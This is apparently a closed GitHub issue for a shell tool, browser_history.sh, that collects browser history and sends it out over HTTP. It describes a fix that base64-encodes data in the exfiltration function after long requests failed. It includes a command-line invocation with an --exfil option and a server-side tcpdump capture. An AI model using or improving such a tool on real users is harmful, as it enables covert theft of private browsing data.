Closed darmado closed 6 days ago
FIXED
base64_encode()
function to handle the base64 encoding.exfiltrate_http()
to always base64 encode the data before sending.Also default b64 encoding to exfil functions
encode_output()
to include a base64 option that trims newlines.exfiltrate_http()
to use encode_output() for base64 encoding, setting ENCODE=base64 temporarily.main()
function logic mostly the same to make sure the script honors --encode arg encode_output()
function.
Unable to exfil data when size of data exceeds HTTP RFC standards.
Command ╰─➤ sh browser_history.sh -c --exfil=http://localhost
Evidence - Server side response
tcpdump -ni lo0 port 80 -A -s 0 -l
`....s...HTTP/1.1 414 Request-URI Too Long Date: Wed, 18 Sep 2024 05:07:05 GMT Server: Apache/2.4.56 (Unix) Content-Length: 248 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
Request-URI Too Long
The requested URL's length exceeds the capacity limit for this server.
`